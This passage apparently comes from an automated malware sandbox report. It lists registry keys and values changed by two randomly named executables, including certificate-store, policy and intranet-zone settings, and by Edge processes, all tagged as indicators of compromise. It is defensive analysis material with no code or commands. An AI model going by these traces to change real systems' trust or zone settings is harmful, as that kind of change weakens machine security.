svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" 0IzhjBLGzhfJ1lBcluP4OBHg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" L_qUXI6RtLVPIQVw95aSnM00.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 0IzhjBLGzhfJ1lBcluP4OBHg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" 0IzhjBLGzhfJ1lBcluP4OBHg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" 0IzhjBLGzhfJ1lBcluP4OBHg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" 0IzhjBLGzhfJ1lBcluP4OBHg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" 0IzhjBLGzhfJ1lBcluP4OBHg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" 0IzhjBLGzhfJ1lBcluP4OBHg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" 0IzhjBLGzhfJ1lBcluP4OBHg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" 0IzhjBLGzhfJ1lBcluP4OBHg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time" L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" L_qUXI6RtLVPIQVw95aSnM00.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust 0IzhjBLGzhfJ1lBcluP4OBHg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" L_qUXI6RtLVPIQVw95aSnM00.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates L_qUXI6RtLVPIQVw95aSnM00.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates 0IzhjBLGzhfJ1lBcluP4OBHg.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 0IzhjBLGzhfJ1lBcluP4OBHg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" L_qUXI6RtLVPIQVw95aSnM00.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" 0IzhjBLGzhfJ1lBcluP4OBHg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" 0IzhjBLGzhfJ1lBcluP4OBHg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" L_qUXI6RtLVPIQVw95aSnM00.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs L_qUXI6RtLVPIQVw95aSnM00.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot 0IzhjBLGzhfJ1lBcluP4OBHg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" 0IzhjBLGzhfJ1lBcluP4OBHg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" L_qUXI6RtLVPIQVw95aSnM00.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" 0IzhjBLGzhfJ1lBcluP4OBHg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" 0IzhjBLGzhfJ1lBcluP4OBHg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" 0IzhjBLGzhfJ1lBcluP4OBHg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" L_qUXI6RtLVPIQVw95aSnM00.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople L_qUXI6RtLVPIQVw95aSnM00.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" 0IzhjBLGzhfJ1lBcluP4OBHg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" 0IzhjBLGzhfJ1lBcluP4OBHg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" L_qUXI6RtLVPIQVw95aSnM00.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d3400dd74d7dd701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{WW6060MI-ED3Y-MI7M-57W2-EJZ5M77G1X0K} svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{QJ2559JN-BF7A-LM2A-20M4-JBF9M43Q7G3S} svchost.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersion = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompletedV = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IY7880QH-GQ0R-SG6F-75Z5-PGQ2S76C3D6F}\650478DC7424C37C svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 301bd569d72dd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionIn = "5" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 010000003802ac211a7861526a623a556dbff3a978546bff4e91c981d7e64fb945c209c2009c6598c1ca6508740a1a516dbf4463af2c3c08006d27f56df5 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SplashScreen Process not Found Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\LastClosedWidth = "800" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 010000002d569c123d90bc5137def4d19600712f0575bd77c183054b821355213e30df6f1476068a86d0af7b2f3d06b27f839949060d177afc5af1c458af1cc523fd868b892e5367ce459f6f51fd36d193aedf66e966fd823f9ca4e7e09f MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\ClearBrowsingHistoryOnStart = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance Process not Found Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache MicrosoftEdgeCP.exe -
